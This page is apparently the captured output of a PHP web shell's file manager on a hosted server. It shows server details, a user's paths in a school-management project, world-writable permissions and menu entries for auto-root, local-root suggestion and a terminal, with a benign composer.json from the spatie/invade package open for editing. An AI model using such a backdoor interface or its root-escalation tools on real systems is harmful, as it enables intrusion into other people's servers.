Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.216.199
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
schoolms /
vendor /
spatie /
invade /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
CHANGELOG.md
3.03
KB
-rw-rw-rw-
2024-05-16 23:06
LICENSE.md
1.06
KB
-rw-rw-rw-
2024-05-16 23:06
README.md
4.06
KB
-rw-rw-rw-
2024-05-16 23:06
composer.json
1.16
KB
-rw-rw-rw-
2024-05-16 23:06
phpstan-baseline.neon
0
B
-rw-rw-rw-
2024-05-16 23:06
phpstan.neon.dist
156
B
-rw-rw-rw-
2024-05-16 23:06
Save
Rename
{ "name": "spatie/invade", "description": "A PHP function to work with private properties and methods", "keywords": [ "spatie", "invade" ], "homepage": "https://github.com/spatie/invade", "license": "MIT", "authors": [ { "name": "Freek Van der Herten", "email": "freek@spatie.be", "role": "Developer" } ], "require": { "php": "^8.0" }, "require-dev": { "pestphp/pest": "^1.20", "phpstan/phpstan": "^1.4", "spatie/ray": "^1.28" }, "autoload": { "psr-4": { "Spatie\\Invade\\": "src" }, "files": [ "src/functions.php" ] }, "autoload-dev": { "psr-4": { "Spatie\\Invade\\Tests\\": "tests" } }, "scripts": { "analyse": "vendor/bin/phpstan analyse", "test": "vendor/bin/pest", "test-coverage": "vendor/bin/pest --coverage" }, "config": { "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true } }, "minimum-stability": "dev", "prefer-stable": true }